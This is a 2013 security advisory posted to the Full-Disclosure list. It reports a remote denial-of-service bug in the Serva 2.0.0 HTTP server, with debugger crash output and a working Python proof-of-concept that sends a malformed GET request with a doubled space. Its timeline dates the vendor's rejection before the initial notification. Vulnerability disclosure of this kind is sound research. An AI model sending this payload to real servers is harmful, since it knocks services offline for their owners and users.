[<prev] [next>] [day] [month] [year] [list]
Message-ID: <50F47771.7010901@inshell.net>
Date: Mon, 14 Jan 2013 22:24:01 +0100
From: Inshell Security <info@...hell.net>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,
vuln@...unia.com, submissions@...ketstormsecurity.org,
moderators@...db.org
Subject: [IA34] Serva v2.0.0 HTTP Server GET Remote Denial
of Service
Inshell Security Advisory
http://www.inshell.net
1. ADVISORY INFORMATION
-----------------------
Product: Serva
Vendor URL: www.vercot.com
Type: Uncaught Exception [CWE-248]
Date found: 2012-12-07
Date published: 2013-01-14
CVSSv2 Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE: -
2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
Inshell Security.
3. VERSIONS AFFECTED
--------------------
Serva 2.0.0, older versions may be affected too.
4. VULNERABILITY DESCRIPTION
----------------------------
Serva v2.0.0 suffers from a Remote Denial of Service Vulnerability in
the HTTP module.
The application uses a space delimiter to parse a GET Request. Adding
more than one space (\x20) behind the GET will cause the application to
crash with an unhandled c++ exception.
(b50.18c): Unknown exception - code 000006d9 (first chance)
(b50.a9c): C++ EH exception - code e06d7363 (first chance)
(b50.a9c): C++ EH exception - code e06d7363 (!!! second chance !!!)
eax=017d6668 ebx=00000000 ecx=00000000 edx=00000003 esi=017d66f0
edi=ffffffff
eip=7c812afb esp=017d6664 ebp=017d66b8 iopl=0 nv up ei pl nz na
pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00000206
kernel32!RaiseException+0x53:
7c812afb 5e pop esi
5. PROOF-OF-CONCEPT (CODE / Exploit)
------------------------------------
#!/usr/bin/python
import socket
target="192.168.0.21"
port=80
# 0000 47 45 54 20 20 2f 20 48 54 54 50 2f 31 2e 31 0d GET / HTTP/1.1.
# 0010 0a 48 6f 73 74 3a 20 68 74 74 70 3a 2f 2f 31 39 .Host: http://19
# 0020 32 2e 31 36 38 2e 30 2e 32 31 0d 0a 43 6f 6e 74 2.168.0.21..Cont
# 0030 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 0d ent-Length: 0...
# 0040 0a .
payload = (
"\x47\x45\x54\x20\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\x0d"+
"\x0a\x48\x6f\x73\x74\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x39"+
"\x32\x2e\x31\x36\x38\x2e\x30\x2e\x32\x31\x0d\x0a\x43\x6f\x6e\x74"+
"\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x30\x0d\x0a\x0d"+
"\x0a"
)
print "[*] Connecting to Target " + target + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect=s.connect((target, port))
print "[*] Connected to " + target + "!"
except:
print "[!] " + target + " didn't respond\n"
sys.exit(0)
print "[*] Sending malformed request..."
s.send(payload)
print "[!] Exploit has been sent!\n"
s.close()
For further Screenshots and/or PoCs visit:
http://security.inshell.net/advisory/34
6. SOLUTION
-----------
None
7. REPORT TIMELINE
------------------
2012-12-07: Initial notification sent to vendor
2012-07-18: Vendor does not accept the bug
2013-01-14: Full Disclosure
8. REFERENCES
-------------
http://security.inshell.net/advisory/34
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists